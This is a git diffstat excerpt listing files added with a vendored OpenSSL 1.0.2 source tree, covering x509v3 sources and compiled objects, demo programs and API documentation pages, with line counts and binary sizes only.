 .../openssl-1.0.2/crypto/x509v3/v3_pku.c      |   114 +
 .../openssl-1.0.2/crypto/x509v3/v3_pku.o      |   Bin 0 -> 4120 bytes
 .../openssl-1.0.2/crypto/x509v3/v3_pmaps.c    |   156 +
 .../openssl-1.0.2/crypto/x509v3/v3_pmaps.o    |   Bin 0 -> 5152 bytes
 .../openssl-1.0.2/crypto/x509v3/v3_prn.c      |   259 +
 .../openssl-1.0.2/crypto/x509v3/v3_prn.o      |   Bin 0 -> 6160 bytes
 .../openssl-1.0.2/crypto/x509v3/v3_purp.c     |   851 ++
 .../openssl-1.0.2/crypto/x509v3/v3_purp.o     |   Bin 0 -> 14176 bytes
 .../openssl-1.0.2/crypto/x509v3/v3_scts.c     |   323 +
 .../openssl-1.0.2/crypto/x509v3/v3_scts.o     |   Bin 0 -> 6904 bytes
 .../openssl-1.0.2/crypto/x509v3/v3_skey.c     |   150 +
 .../openssl-1.0.2/crypto/x509v3/v3_skey.o     |   Bin 0 -> 3560 bytes
 .../openssl-1.0.2/crypto/x509v3/v3_sxnet.c    |   273 +
 .../openssl-1.0.2/crypto/x509v3/v3_sxnet.o    |   Bin 0 -> 8264 bytes
 .../openssl-1.0.2/crypto/x509v3/v3_utl.c      |  1337 ++
 .../openssl-1.0.2/crypto/x509v3/v3_utl.o      |   Bin 0 -> 19608 bytes
 .../openssl-1.0.2/crypto/x509v3/v3conf.c      |   129 +
 .../openssl-1.0.2/crypto/x509v3/v3err.c       |   249 +
 .../openssl-1.0.2/crypto/x509v3/v3err.o       |   Bin 0 -> 1368 bytes
 .../openssl-1.0.2/crypto/x509v3/v3nametest.c  |   336 +
 .../openssl-1.0.2/crypto/x509v3/v3prin.c      |    99 +
 .../openssl-1.0.2/crypto/x509v3/x509v3.h      |  1055 ++
 .../openssl-1.0.2/crypto/x86_64cpuid.pl       |   309 +
 .../openssl-1.0.2/crypto/x86cpuid.pl          |   387 +
 .../openssl-1.0.2/demos/README                |     9 +
 .../openssl-1.0.2/demos/asn1/README.ASN1      |     7 +
 .../openssl-1.0.2/demos/asn1/ocsp.c           |   361 +
 .../openssl-1.0.2/demos/b64.c                 |   255 +
 .../openssl-1.0.2/demos/b64.pl                |    20 +
 .../openssl-1.0.2/demos/bio/Makefile          |    22 +
 .../openssl-1.0.2/demos/bio/README            |     7 +
 .../openssl-1.0.2/demos/bio/accept.cnf        |    13 +
 .../openssl-1.0.2/demos/bio/client-arg.c      |   111 +
 .../openssl-1.0.2/demos/bio/client-conf.c     |   120 +
 .../openssl-1.0.2/demos/bio/connect.cnf       |     9 +
 .../openssl-1.0.2/demos/bio/saccept.c         |   117 +
 .../openssl-1.0.2/demos/bio/sconnect.c        |   113 +
 .../openssl-1.0.2/demos/bio/server-arg.c      |   144 +
 .../openssl-1.0.2/demos/bio/server-conf.c     |   138 +
 .../openssl-1.0.2/demos/bio/server.pem        |    52 +
 .../openssl-1.0.2/demos/cms/cacert.pem        |    18 +
 .../openssl-1.0.2/demos/cms/cakey.pem         |    15 +
 .../openssl-1.0.2/demos/cms/cms_comp.c        |    60 +
 .../openssl-1.0.2/demos/cms/cms_ddec.c        |    89 +
 .../openssl-1.0.2/demos/cms/cms_dec.c         |    78 +
 .../openssl-1.0.2/demos/cms/cms_denc.c        |    98 +
 .../openssl-1.0.2/demos/cms/cms_enc.c         |    92 +
 .../openssl-1.0.2/demos/cms/cms_sign.c        |    88 +
 .../openssl-1.0.2/demos/cms/cms_sign2.c       |   102 +
 .../openssl-1.0.2/demos/cms/cms_uncomp.c      |    55 +
 .../openssl-1.0.2/demos/cms/cms_ver.c         |    85 +
 .../openssl-1.0.2/demos/cms/comp.txt          |    22 +
 .../openssl-1.0.2/demos/cms/encr.txt          |     3 +
 .../openssl-1.0.2/demos/cms/sign.txt          |     3 +
 .../openssl-1.0.2/demos/cms/signer.pem        |    32 +
 .../openssl-1.0.2/demos/cms/signer2.pem       |    32 +
 .../openssl-1.0.2/demos/easy_tls/Makefile     |   123 +
 .../openssl-1.0.2/demos/easy_tls/README       |    65 +
 .../openssl-1.0.2/demos/easy_tls/cacerts.pem  |    18 +
 .../openssl-1.0.2/demos/easy_tls/cert.pem     |    31 +
 .../openssl-1.0.2/demos/easy_tls/easy-tls.c   |  1310 ++
 .../openssl-1.0.2/demos/easy_tls/easy-tls.h   |    60 +
 .../openssl-1.0.2/demos/easy_tls/test.c       |   248 +
 .../openssl-1.0.2/demos/easy_tls/test.h       |    10 +
 .../demos/engines/cluster_labs/Makefile       |   114 +
 .../demos/engines/cluster_labs/cluster_labs.h |    33 +
 .../engines/cluster_labs/hw_cluster_labs.c    |   692 +
 .../engines/cluster_labs/hw_cluster_labs.ec   |     8 +
 .../cluster_labs/hw_cluster_labs_err.c        |   152 +
 .../cluster_labs/hw_cluster_labs_err.h        |   100 +
 .../demos/engines/ibmca/Makefile              |   114 +
 .../demos/engines/ibmca/hw_ibmca.c            |   900 ++
 .../demos/engines/ibmca/hw_ibmca.ec           |     8 +
 .../demos/engines/ibmca/hw_ibmca_err.c        |   149 +
 .../demos/engines/ibmca/hw_ibmca_err.h        |   103 +
 .../demos/engines/ibmca/ica_openssl_api.h     |   183 +
 .../demos/engines/rsaref/Makefile             |   135 +
 .../openssl-1.0.2/demos/engines/rsaref/README |    22 +
 .../demos/engines/rsaref/build.com            |   105 +
 .../demos/engines/rsaref/rsaref.c             |   713 +
 .../demos/engines/rsaref/rsaref.ec            |     8 +
 .../demos/engines/rsaref/rsaref_err.c         |   158 +
 .../demos/engines/rsaref/rsaref_err.h         |   110 +
 .../demos/engines/zencod/Makefile             |   114 +
 .../demos/engines/zencod/hw_zencod.c          |  1809 +++
 .../demos/engines/zencod/hw_zencod.ec         |     8 +
 .../demos/engines/zencod/hw_zencod.h          |   159 +
 .../demos/engines/zencod/hw_zencod_err.c      |   147 +
 .../demos/engines/zencod/hw_zencod_err.h      |   100 +
 .../openssl-1.0.2/demos/pkcs12/README         |     3 +
 .../openssl-1.0.2/demos/pkcs12/pkread.c       |    61 +
 .../openssl-1.0.2/demos/pkcs12/pkwrite.c      |    46 +
 .../openssl-1.0.2/demos/prime/Makefile        |    20 +
 .../openssl-1.0.2/demos/prime/prime.c         |   102 +
 .../openssl-1.0.2/demos/privkey.pem           |     9 +
 .../openssl-1.0.2/demos/selfsign.c            |   176 +
 .../openssl-1.0.2/demos/sign/Makefile         |    15 +
 .../openssl-1.0.2/demos/sign/cert.pem         |    14 +
 .../openssl-1.0.2/demos/sign/key.pem          |     9 +
 .../openssl-1.0.2/demos/sign/sig.txt          |   158 +
 .../openssl-1.0.2/demos/sign/sign.c           |   160 +
 .../openssl-1.0.2/demos/sign/sign.txt         |   170 +
 .../openssl-1.0.2/demos/smime/cacert.pem      |    18 +
 .../openssl-1.0.2/demos/smime/cakey.pem       |    15 +
 .../openssl-1.0.2/demos/smime/encr.txt        |     3 +
 .../openssl-1.0.2/demos/smime/sign.txt        |     3 +
 .../openssl-1.0.2/demos/smime/signer.pem      |    32 +
 .../openssl-1.0.2/demos/smime/signer2.pem     |    32 +
 .../openssl-1.0.2/demos/smime/smdec.c         |    78 +
 .../openssl-1.0.2/demos/smime/smenc.c         |    92 +
 .../openssl-1.0.2/demos/smime/smsign.c        |    88 +
 .../openssl-1.0.2/demos/smime/smsign2.c       |   102 +
 .../openssl-1.0.2/demos/smime/smver.c         |    85 +
 .../openssl-1.0.2/demos/spkigen.c             |   172 +
 .../openssl-1.0.2/demos/ssl/cli.cpp           |   110 +
 .../openssl-1.0.2/demos/ssl/inetdsrv.cpp      |    98 +
 .../openssl-1.0.2/demos/ssl/serv.cpp          |   152 +
 .../demos/ssltest-ecc/ECC-RSAcertgen.sh       |    98 +
 .../demos/ssltest-ecc/ECCcertgen.sh           |   164 +
 .../openssl-1.0.2/demos/ssltest-ecc/README    |    15 +
 .../demos/ssltest-ecc/RSAcertgen.sh           |   121 +
 .../demos/ssltest-ecc/ssltest.sh              |   188 +
 .../demos/state_machine/Makefile              |     9 +
 .../demos/state_machine/state_machine.c       |   407 +
 .../openssl-1.0.2/demos/tunala/A-client.pem   |    84 +
 .../openssl-1.0.2/demos/tunala/A-server.pem   |    84 +
 .../openssl-1.0.2/demos/tunala/CA.pem         |    24 +
 .../openssl-1.0.2/demos/tunala/INSTALL        |   107 +
 .../openssl-1.0.2/demos/tunala/Makefile       |    41 +
 .../openssl-1.0.2/demos/tunala/Makefile.am    |     7 +
 .../openssl-1.0.2/demos/tunala/README         |   233 +
 .../openssl-1.0.2/demos/tunala/autogunk.sh    |    25 +
 .../openssl-1.0.2/demos/tunala/autoungunk.sh  |    19 +
 .../openssl-1.0.2/demos/tunala/breakage.c     |    68 +
 .../openssl-1.0.2/demos/tunala/buffer.c       |   236 +
 .../openssl-1.0.2/demos/tunala/cb.c           |   173 +
 .../openssl-1.0.2/demos/tunala/configure.in   |    29 +
 .../openssl-1.0.2/demos/tunala/ip.c           |   149 +
 .../openssl-1.0.2/demos/tunala/sm.c           |   164 +
 .../openssl-1.0.2/demos/tunala/test.sh        |   107 +
 .../openssl-1.0.2/demos/tunala/tunala.c       |  1183 ++
 .../openssl-1.0.2/demos/tunala/tunala.h       |   244 +
 .../openssl-1.0.2/demos/x509/README           |     3 +
 .../openssl-1.0.2/demos/x509/mkcert.c         |   169 +
 .../openssl-1.0.2/demos/x509/mkreq.c          |   168 +
 .../openssl-1.0.2/doc/HOWTO/certificates.txt  |   110 +
 .../openssl-1.0.2/doc/HOWTO/keys.txt          |    73 +
 .../doc/HOWTO/proxy_certificates.txt          |   306 +
 .../openssl-1.0.2/doc/README                  |    12 +
 .../openssl-1.0.2/doc/apps/CA.pl.pod          |   179 +
 .../openssl-1.0.2/doc/apps/asn1parse.pod      |   185 +
 .../openssl-1.0.2/doc/apps/c_rehash.pod       |   114 +
 .../openssl-1.0.2/doc/apps/ca.pod             |   696 +
 .../openssl-1.0.2/doc/apps/ciphers.pod        |   638 +
 .../openssl-1.0.2/doc/apps/cms.pod            |   658 +
 .../openssl-1.0.2/doc/apps/config.pod         |   279 +
 .../openssl-1.0.2/doc/apps/crl.pod            |   128 +
 .../openssl-1.0.2/doc/apps/crl2pkcs7.pod      |    91 +
 .../openssl-1.0.2/doc/apps/dgst.pod           |   213 +
 .../openssl-1.0.2/doc/apps/dhparam.pod        |   146 +
 .../openssl-1.0.2/doc/apps/dsa.pod            |   164 +
 .../openssl-1.0.2/doc/apps/dsaparam.pod       |   110 +
 .../openssl-1.0.2/doc/apps/ec.pod             |   190 +
 .../openssl-1.0.2/doc/apps/ecparam.pod        |   179 +
 .../openssl-1.0.2/doc/apps/enc.pod            |   333 +
 .../openssl-1.0.2/doc/apps/errstr.pod         |    39 +
 .../openssl-1.0.2/doc/apps/gendsa.pod         |    72 +
 .../openssl-1.0.2/doc/apps/genpkey.pod        |   228 +
 .../openssl-1.0.2/doc/apps/genrsa.pod         |   108 +
 .../openssl-1.0.2/doc/apps/nseq.pod           |    70 +
 .../openssl-1.0.2/doc/apps/ocsp.pod           |   375 +
 .../openssl-1.0.2/doc/apps/openssl.pod        |   422 +
 .../openssl-1.0.2/doc/apps/passwd.pod         |    82 +
 .../openssl-1.0.2/doc/apps/pkcs12.pod         |   368 +
 .../openssl-1.0.2/doc/apps/pkcs7.pod          |   105 +
 .../openssl-1.0.2/doc/apps/pkcs8.pod          |   255 +
 .../openssl-1.0.2/doc/apps/pkey.pod           |   135 +
 .../openssl-1.0.2/doc/apps/pkeyparam.pod      |    69 +
 .../openssl-1.0.2/doc/apps/pkeyutl.pod        |   222 +
 .../openssl-1.0.2/doc/apps/rand.pod           |    55 +
 .../openssl-1.0.2/doc/apps/req.pod            |   678 +
 .../openssl-1.0.2/doc/apps/rsa.pod            |   210 +
 .../openssl-1.0.2/doc/apps/rsautl.pod         |   183 +
 .../openssl-1.0.2/doc/apps/s_client.pod       |   364 +
 .../openssl-1.0.2/doc/apps/s_server.pod       |   409 +
 .../openssl-1.0.2/doc/apps/s_time.pod         |   173 +
 .../openssl-1.0.2/doc/apps/sess_id.pod        |   151 +
 .../openssl-1.0.2/doc/apps/smime.pod          |   445 +
 .../openssl-1.0.2/doc/apps/speed.pod          |    59 +
 .../openssl-1.0.2/doc/apps/spkac.pod          |   133 +
 .../openssl-1.0.2/doc/apps/ts.pod             |   594 +
 .../openssl-1.0.2/doc/apps/tsget.pod          |   194 +
 .../openssl-1.0.2/doc/apps/verify.pod         |   428 +
 .../openssl-1.0.2/doc/apps/version.pod        |    65 +
 .../openssl-1.0.2/doc/apps/x509.pod           |   889 ++
 .../openssl-1.0.2/doc/apps/x509v3_config.pod  |   529 +
 .../openssl-1.0.2/doc/c-indentation.el        |    45 +
 .../doc/crypto/ASN1_OBJECT_new.pod            |    45 +
 .../doc/crypto/ASN1_STRING_length.pod         |    83 +
 .../doc/crypto/ASN1_STRING_new.pod            |    46 +
 .../doc/crypto/ASN1_STRING_print_ex.pod       |    96 +
 .../doc/crypto/ASN1_generate_nconf.pod        |   265 +
 .../openssl-1.0.2/doc/crypto/BIO_ctrl.pod     |   128 +
 .../openssl-1.0.2/doc/crypto/BIO_f_base64.pod |    82 +
 .../openssl-1.0.2/doc/crypto/BIO_f_buffer.pod |    74 +
 .../openssl-1.0.2/doc/crypto/BIO_f_cipher.pod |    76 +
 .../openssl-1.0.2/doc/crypto/BIO_f_md.pod     |   144 +
 .../openssl-1.0.2/doc/crypto/BIO_f_null.pod   |    32 +
 .../openssl-1.0.2/doc/crypto/BIO_f_ssl.pod    |   322 +
 .../doc/crypto/BIO_find_type.pod              |    98 +
 .../openssl-1.0.2/doc/crypto/BIO_new.pod      |    65 +
 .../openssl-1.0.2/doc/crypto/BIO_new_CMS.pod  |    66 +
 .../openssl-1.0.2/doc/crypto/BIO_push.pod     |    69 +
 .../openssl-1.0.2/doc/crypto/BIO_read.pod     |    66 +
 .../openssl-1.0.2/doc/crypto/BIO_s_accept.pod |   195 +
 .../openssl-1.0.2/doc/crypto/BIO_s_bio.pod    |   182 +
 .../doc/crypto/BIO_s_connect.pod              |   192 +
 .../openssl-1.0.2/doc/crypto/BIO_s_fd.pod     |    89 +
 .../openssl-1.0.2/doc/crypto/BIO_s_file.pod   |   148 +
 .../openssl-1.0.2/doc/crypto/BIO_s_mem.pod    |   115 +
 .../openssl-1.0.2/doc/crypto/BIO_s_null.pod   |    37 +
 .../openssl-1.0.2/doc/crypto/BIO_s_socket.pod |    63 +
 .../doc/crypto/BIO_set_callback.pod           |   108 +
 .../doc/crypto/BIO_should_retry.pod           |   114 +
 .../doc/crypto/BN_BLINDING_new.pod            |   115 +
 .../openssl-1.0.2/doc/crypto/BN_CTX_new.pod   |    57 +
 .../openssl-1.0.2/doc/crypto/BN_CTX_start.pod |    52 +
 .../openssl-1.0.2/doc/crypto/BN_add.pod       |   126 +
 .../openssl-1.0.2/doc/crypto/BN_add_word.pod  |    61 +
 .../openssl-1.0.2/doc/crypto/BN_bn2bin.pod    |    95 +
 .../openssl-1.0.2/doc/crypto/BN_cmp.pod       |    48 +
 .../openssl-1.0.2/doc/crypto/BN_copy.pod      |    34 +
 .../doc/crypto/BN_generate_prime.pod          |   150 +
 .../doc/crypto/BN_mod_inverse.pod             |    36 +
 .../doc/crypto/BN_mod_mul_montgomery.pod      |   101 +
 .../doc/crypto/BN_mod_mul_reciprocal.pod      |    81 +
 .../openssl-1.0.2/doc/crypto/BN_new.pod       |    53 +
 .../openssl-1.0.2/doc/crypto/BN_num_bytes.pod |    57 +
 .../openssl-1.0.2/doc/crypto/BN_rand.pod      |    58 +
 .../openssl-1.0.2/doc/crypto/BN_set_bit.pod   |    66 +
 .../openssl-1.0.2/doc/crypto/BN_swap.pod      |    23 +
 .../openssl-1.0.2/doc/crypto/BN_zero.pod      |    59 +
 .../doc/crypto/CMS_add0_cert.pod              |    66 +
 .../doc/crypto/CMS_add1_recipient_cert.pod    |    62 +
 .../doc/crypto/CMS_add1_signer.pod            |   101 +
 .../openssl-1.0.2/doc/crypto/CMS_compress.pod |    73 +
 .../openssl-1.0.2/doc/crypto/CMS_decrypt.pod  |    79 +
 .../openssl-1.0.2/doc/crypto/CMS_encrypt.pod  |    96 +
 .../openssl-1.0.2/doc/crypto/CMS_final.pod    |    41 +
 .../doc/crypto/CMS_get0_RecipientInfos.pod    |   120 +
 .../doc/crypto/CMS_get0_SignerInfos.pod       |    81 +
 .../doc/crypto/CMS_get0_type.pod              |    63 +
 .../doc/crypto/CMS_get1_ReceiptRequest.pod    |    69 +
 .../openssl-1.0.2/doc/crypto/CMS_sign.pod     |   121 +
 .../doc/crypto/CMS_sign_receipt.pod           |    45 +
 .../doc/crypto/CMS_uncompress.pod             |    54 +
 .../openssl-1.0.2/doc/crypto/CMS_verify.pod   |   126 +
 .../doc/crypto/CMS_verify_receipt.pod         |    47 +
 .../doc/crypto/CONF_modules_free.pod          |    47 +
 .../doc/crypto/CONF_modules_load_file.pod     |    60 +
 .../doc/crypto/CRYPTO_set_ex_data.pod         |    53 +
 .../doc/crypto/DH_generate_key.pod            |    50 +
 .../doc/crypto/DH_generate_parameters.pod     |    82 +
 .../doc/crypto/DH_get_ex_new_index.pod        |    36 +
 .../openssl-1.0.2/doc/crypto/DH_new.pod       |    40 +
 .../doc/crypto/DH_set_method.pod              |   129 +
 .../openssl-1.0.2/doc/crypto/DH_size.pod      |    33 +
 .../openssl-1.0.2/doc/crypto/DSA_SIG_new.pod  |    40 +
 .../openssl-1.0.2/doc/crypto/DSA_do_sign.pod  |    47 +
 .../openssl-1.0.2/doc/crypto/DSA_dup_DH.pod   |    36 +
 .../doc/crypto/DSA_generate_key.pod           |    34 +
 .../doc/crypto/DSA_generate_parameters.pod    |   121 +
 .../doc/crypto/DSA_get_ex_new_index.pod       |    36 +
 .../openssl-1.0.2/doc/crypto/DSA_new.pod      |    42 +
 .../doc/crypto/DSA_set_method.pod             |   143 +
 .../openssl-1.0.2/doc/crypto/DSA_sign.pod     |    66 +
 .../openssl-1.0.2/doc/crypto/DSA_size.pod     |    33 +
 .../doc/crypto/EC_GFp_simple_method.pod       |    60 +
 .../doc/crypto/EC_GROUP_copy.pod              |   174 +
 .../openssl-1.0.2/doc/crypto/EC_GROUP_new.pod |    95 +
 .../openssl-1.0.2/doc/crypto/EC_KEY_new.pod   |   120 +
 .../openssl-1.0.2/doc/crypto/EC_POINT_add.pod |    72 +
 .../openssl-1.0.2/doc/crypto/EC_POINT_new.pod |   123 +
 .../openssl-1.0.2/doc/crypto/ERR_GET_LIB.pod  |    51 +
 .../doc/crypto/ERR_clear_error.pod            |    29 +
 .../doc/crypto/ERR_error_string.pod           |    73 +
 .../doc/crypto/ERR_get_error.pod              |    79 +
 .../doc/crypto/ERR_load_crypto_strings.pod    |    46 +
 .../doc/crypto/ERR_load_strings.pod           |    54 +
 .../doc/crypto/ERR_print_errors.pod           |    51 +
 .../doc/crypto/ERR_put_error.pod              |    44 +
 .../doc/crypto/ERR_remove_state.pod           |    45 +
 .../openssl-1.0.2/doc/crypto/ERR_set_mark.pod |    38 +
 .../doc/crypto/EVP_BytesToKey.pod             |    70 +
 .../doc/crypto/EVP_DigestInit.pod             |   282 +
 .../doc/crypto/EVP_DigestSignInit.pod         |    87 +
 .../doc/crypto/EVP_DigestVerifyInit.pod       |    82 +
 .../doc/crypto/EVP_EncryptInit.pod            |   593 +
 .../openssl-1.0.2/doc/crypto/EVP_OpenInit.pod |    63 +
 .../doc/crypto/EVP_PKEY_CTX_ctrl.pod          |   134 +
 .../doc/crypto/EVP_PKEY_CTX_new.pod           |    52 +
 .../openssl-1.0.2/doc/crypto/EVP_PKEY_cmp.pod |    61 +
 .../doc/crypto/EVP_PKEY_decrypt.pod           |    93 +
 .../doc/crypto/EVP_PKEY_derive.pod            |    93 +
 .../doc/crypto/EVP_PKEY_encrypt.pod           |    99 +
 .../crypto/EVP_PKEY_get_default_digest.pod    |    41 +
 .../doc/crypto/EVP_PKEY_keygen.pod            |   161 +
 .../openssl-1.0.2/doc/crypto/EVP_PKEY_new.pod |    47 +
 .../doc/crypto/EVP_PKEY_print_private.pod     |    53 +
 .../doc/crypto/EVP_PKEY_set1_RSA.pod          |    80 +
 .../doc/crypto/EVP_PKEY_sign.pod              |   106 +
 .../doc/crypto/EVP_PKEY_verify.pod            |    91 +
 .../doc/crypto/EVP_PKEY_verify_recover.pod    |   103 +
 .../openssl-1.0.2/doc/crypto/EVP_SealInit.pod |    85 +
 .../openssl-1.0.2/doc/crypto/EVP_SignInit.pod |   106 +
 .../doc/crypto/EVP_VerifyInit.pod             |    95 +
 .../openssl-1.0.2/doc/crypto/OBJ_nid2obj.pod  |   151 +
 .../doc/crypto/OPENSSL_Applink.pod            |    21 +
 .../doc/crypto/OPENSSL_VERSION_NUMBER.pod     |   101 +
 .../doc/crypto/OPENSSL_config.pod             |    82 +
 .../doc/crypto/OPENSSL_ia32cap.pod            |    96 +
 .../doc/crypto/OPENSSL_instrument_bus.pod     |    42 +
 .../crypto/OPENSSL_load_builtin_modules.pod   |    51 +
 .../doc/crypto/OpenSSL_add_all_algorithms.pod |    66 +
 .../doc/crypto/PEM_write_bio_CMS_stream.pod   |    41 +
 .../doc/crypto/PEM_write_bio_PKCS7_stream.pod |    41 +
 .../doc/crypto/PKCS12_create.pod              |    75 +
 .../openssl-1.0.2/doc/crypto/PKCS12_parse.pod |    57 +
 .../doc/crypto/PKCS7_decrypt.pod              |    55 +
 .../doc/crypto/PKCS7_encrypt.pod              |    80 +
 .../openssl-1.0.2/doc/crypto/PKCS7_sign.pod   |   116 +
 .../doc/crypto/PKCS7_sign_add_signer.pod      |    87 +
 .../openssl-1.0.2/doc/crypto/PKCS7_verify.pod |   118 +
 .../openssl-1.0.2/doc/crypto/RAND_add.pod     |    77 +
 .../openssl-1.0.2/doc/crypto/RAND_bytes.pod   |    50 +
 .../openssl-1.0.2/doc/crypto/RAND_cleanup.pod |    29 +
 .../openssl-1.0.2/doc/crypto/RAND_egd.pod     |    88 +
 .../doc/crypto/RAND_load_file.pod             |    53 +
 .../doc/crypto/RAND_set_rand_method.pod       |    83 +
 .../doc/crypto/RSA_blinding_on.pod            |    43 +
 .../doc/crypto/RSA_check_key.pod              |    67 +
 .../doc/crypto/RSA_generate_key.pod           |    80 +
 .../doc/crypto/RSA_get_ex_new_index.pod       |   120 +
 .../openssl-1.0.2/doc/crypto/RSA_new.pod      |    41 +
 .../crypto/RSA_padding_add_PKCS1_type_1.pod   |   124 +
 .../openssl-1.0.2/doc/crypto/RSA_print.pod    |    49 +
 .../doc/crypto/RSA_private_encrypt.pod        |    70 +
 .../doc/crypto/RSA_public_encrypt.pod         |    84 +
 .../doc/crypto/RSA_set_method.pod             |   206 +
 .../openssl-1.0.2/doc/crypto/RSA_sign.pod     |    66 +
 .../doc/crypto/RSA_sign_ASN1_OCTET_STRING.pod |    59 +
 .../openssl-1.0.2/doc/crypto/RSA_size.pod     |    33 +
 .../doc/crypto/SMIME_read_CMS.pod             |    70 +
 .../doc/crypto/SMIME_read_PKCS7.pod           |    73 +
 .../doc/crypto/SMIME_write_CMS.pod            |    64 +
 .../doc/crypto/SMIME_write_PKCS7.pod          |    65 +
 .../doc/crypto/SSLeay_version.pod             |    74 +
 .../doc/crypto/X509_NAME_ENTRY_get_object.pod |    74 +
 .../doc/crypto/X509_NAME_add_entry_by_txt.pod |   116 +
 .../doc/crypto/X509_NAME_get_index_by_NID.pod |   112 +
 .../doc/crypto/X509_NAME_print_ex.pod         |   105 +
 .../doc/crypto/X509_STORE_CTX_get_error.pod   |   305 +
 .../X509_STORE_CTX_get_ex_new_index.pod       |    41 +
 .../doc/crypto/X509_STORE_CTX_new.pod         |   122 +
 .../crypto/X509_STORE_CTX_set_verify_cb.pod   |   161 +
 .../crypto/X509_STORE_set_verify_cb_func.pod  |    54 +
 .../crypto/X509_VERIFY_PARAM_set_flags.pod    |   238 +
 .../doc/crypto/X509_check_host.pod            |   137 +
 .../openssl-1.0.2/doc/crypto/X509_new.pod     |    39 +
 .../doc/crypto/X509_verify_cert.pod           |    53 +
 .../openssl-1.0.2/doc/crypto/bio.pod          |    54 +
 .../openssl-1.0.2/doc/crypto/blowfish.pod     |   112 +
 .../openssl-1.0.2/doc/crypto/bn.pod           |   181 +
 .../openssl-1.0.2/doc/crypto/bn_internal.pod  |   238 +
 .../openssl-1.0.2/doc/crypto/buffer.pod       |    73 +
 .../openssl-1.0.2/doc/crypto/crypto.pod       |    85 +
 .../doc/crypto/d2i_ASN1_OBJECT.pod            |    29 +
 .../openssl-1.0.2/doc/crypto/d2i_DHparams.pod |    30 +
 .../doc/crypto/d2i_DSAPublicKey.pod           |    83 +
 .../doc/crypto/d2i_ECPKParameters.pod         |    84 +
 .../doc/crypto/d2i_PKCS8PrivateKey.pod        |    56 +
 .../doc/crypto/d2i_RSAPublicKey.pod           |    67 +
 .../openssl-1.0.2/doc/crypto/d2i_X509.pod     |   254 +
 .../doc/crypto/d2i_X509_ALGOR.pod             |    30 +
 .../openssl-1.0.2/doc/crypto/d2i_X509_CRL.pod |    37 +
 .../doc/crypto/d2i_X509_NAME.pod              |    31 +
 .../openssl-1.0.2/doc/crypto/d2i_X509_REQ.pod |    36 +
 .../openssl-1.0.2/doc/crypto/d2i_X509_SIG.pod |    30 +
 .../openssl-1.0.2/doc/crypto/des.pod          |   357 +
 .../openssl-1.0.2/doc/crypto/des_modes.pod    |   255 +
 .../openssl-1.0.2/doc/crypto/dh.pod           |    78 +
 .../openssl-1.0.2/doc/crypto/dsa.pod          |   114 +
 .../openssl-1.0.2/doc/crypto/ec.pod           |   201 +
 .../openssl-1.0.2/doc/crypto/ecdsa.pod        |   206 +
 .../openssl-1.0.2/doc/crypto/engine.pod       |   599 +
 .../openssl-1.0.2/doc/crypto/err.pod          |   186 +
 .../openssl-1.0.2/doc/crypto/evp.pod          |   103 +
 .../openssl-1.0.2/doc/crypto/hmac.pod         |   106 +
 .../doc/crypto/i2d_CMS_bio_stream.pod         |    44 +
 .../doc/crypto/i2d_PKCS7_bio_stream.pod       |    44 +
 .../openssl-1.0.2/doc/crypto/lh_stats.pod     |    60 +
 .../openssl-1.0.2/doc/crypto/lhash.pod        |   302 +
 .../openssl-1.0.2/doc/crypto/md5.pod          |   101 +
 .../openssl-1.0.2/doc/crypto/mdc2.pod         |    64 +
 .../openssl-1.0.2/doc/crypto/pem.pod          |   480 +
 .../openssl-1.0.2/doc/crypto/rand.pod         |   175 +
 .../openssl-1.0.2/doc/crypto/rc4.pod          |    62 +
 .../openssl-1.0.2/doc/crypto/ripemd.pod       |    66 +
 .../openssl-1.0.2/doc/crypto/rsa.pod          |   123 +
 .../openssl-1.0.2/doc/crypto/sha.pod          |    70 +
 .../openssl-1.0.2/doc/crypto/threads.pod      |   210 +
 .../openssl-1.0.2/doc/crypto/ui.pod           |   194 +
 .../openssl-1.0.2/doc/crypto/ui_compat.pod    |    57 +
 .../openssl-1.0.2/doc/crypto/x509.pod         |    64 +
 .../openssl-1.0.2/doc/fingerprints.txt        |    63 +
 .../openssl-1.0.2/doc/openssl-shared.txt      |    32 +
 .../openssl-1.0.2/doc/openssl.txt             |  1254 ++
 .../openssl-1.0.2/doc/openssl_button.gif      |   Bin 0 -> 2063 bytes
 .../openssl-1.0.2/doc/openssl_button.html     |     7 +
 .../doc/ssl/SSL_CIPHER_get_name.pod           |   132 +
 .../ssl/SSL_COMP_add_compression_method.pod   |    70 +
 .../doc/ssl/SSL_CONF_CTX_new.pod              |    40 +
 .../doc/ssl/SSL_CONF_CTX_set1_prefix.pod      |    49 +
 .../doc/ssl/SSL_CONF_CTX_set_flags.pod        |    68 +
 .../doc/ssl/SSL_CONF_CTX_set_ssl_ctx.pod      |    47 +
 .../openssl-1.0.2/doc/ssl/SSL_CONF_cmd.pod    |   433 +
 .../doc/ssl/SSL_CONF_cmd_argv.pod             |    42 +
 .../doc/ssl/SSL_CTX_add1_chain_cert.pod       |   150 +
 .../doc/ssl/SSL_CTX_add_extra_chain_cert.pod  |    60 +
 .../doc/ssl/SSL_CTX_add_session.pod           |    73 +
 .../openssl-1.0.2/doc/ssl/SSL_CTX_ctrl.pod    |    34 +
 .../doc/ssl/SSL_CTX_flush_sessions.pod        |    49 +
 .../openssl-1.0.2/doc/ssl/SSL_CTX_free.pod    |    41 +
 .../doc/ssl/SSL_CTX_get_ex_new_index.pod      |    53 +
 .../doc/ssl/SSL_CTX_get_verify_mode.pod       |    50 +
 .../doc/ssl/SSL_CTX_load_verify_locations.pod |   124 +
 .../openssl-1.0.2/doc/ssl/SSL_CTX_new.pod     |   108 +
 .../doc/ssl/SSL_CTX_sess_number.pod           |    76 +
 .../doc/ssl/SSL_CTX_sess_set_cache_size.pod   |    53 +
 .../doc/ssl/SSL_CTX_sess_set_get_cb.pod       |    87 +
 .../doc/ssl/SSL_CTX_sessions.pod              |    34 +
 .../doc/ssl/SSL_CTX_set1_curves.pod           |   103 +
 .../ssl/SSL_CTX_set1_verify_cert_store.pod    |    91 +
 .../doc/ssl/SSL_CTX_set_cert_cb.pod           |    68 +
 .../doc/ssl/SSL_CTX_set_cert_store.pod        |    64 +
 .../ssl/SSL_CTX_set_cert_verify_callback.pod  |    75 +
 .../doc/ssl/SSL_CTX_set_cipher_list.pod       |    74 +
 .../doc/ssl/SSL_CTX_set_client_CA_list.pod    |    94 +
 .../doc/ssl/SSL_CTX_set_client_cert_cb.pod    |    94 +
 .../doc/ssl/SSL_CTX_set_custom_cli_ext.pod    |   133 +
 .../doc/ssl/SSL_CTX_set_default_passwd_cb.pod |    76 +
 .../ssl/SSL_CTX_set_generate_session_id.pod   |   150 +
 .../doc/ssl/SSL_CTX_set_info_callback.pod     |   153 +
